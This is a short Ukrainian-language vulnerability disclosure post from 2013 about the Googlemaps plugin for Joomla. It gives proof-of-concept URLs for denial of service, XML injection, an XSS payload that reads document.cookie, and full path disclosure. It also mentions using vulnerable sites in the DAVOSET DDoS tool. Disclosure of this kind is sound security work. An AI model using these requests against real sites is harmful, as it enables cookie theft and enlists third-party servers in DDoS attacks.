Численні уразливості в Googlemaps для Joomla
16:28 16.07.2013У липні, 15.07.2013, я знайшов Denial of Service, XML Injection, Cross-Site Scripting та Full path disclosure уразливості в Googlemaps плагіні для Joomla. Про що найближчим часом повідомлю розробникам веб додатку.
Denial of Service (WASC-10):
http://site/plugins/content/plugin_googlemap2_proxy.php?url=site2/large_file
Окрім проведення DoS атак вручну, також можна проводити автоматизовані DoS і DDoS атаки з використанням DAVOSET.
XML Injection (WASC-23):
http://site/plugins/content/plugin_googlemap2_proxy.php?url=site2/xml.xml
Можна включати зовнішні xml-файли. Що також може бути використано для XSS атаки:
XSS via XML Injection (WASC-23):
http://site/plugins/content/plugin_googlemap2_proxy.php?url=site2/xss.xml
Cross-Site Scripting (WASC-08):
http://site/plugins/content/plugin_googlemap2_proxy.php?url=%3Cbody%20onload=alert(document.cookie)%3E
Full path disclosure (WASC-13):
http://site/plugins/content/plugin_googlemap2_proxy.php
Окрім plugin_googlemap2_proxy.php, також трапляється plugin_googlemap3_proxy.php (але він має інший шлях на сайтах).
Уразливі Googlemaps plugin for Joomla версії 2.x, 3.x та потенційно попередні версії. В новій версії DAVOSET я додам чимало сайтів з цим Googlemaps плагіном.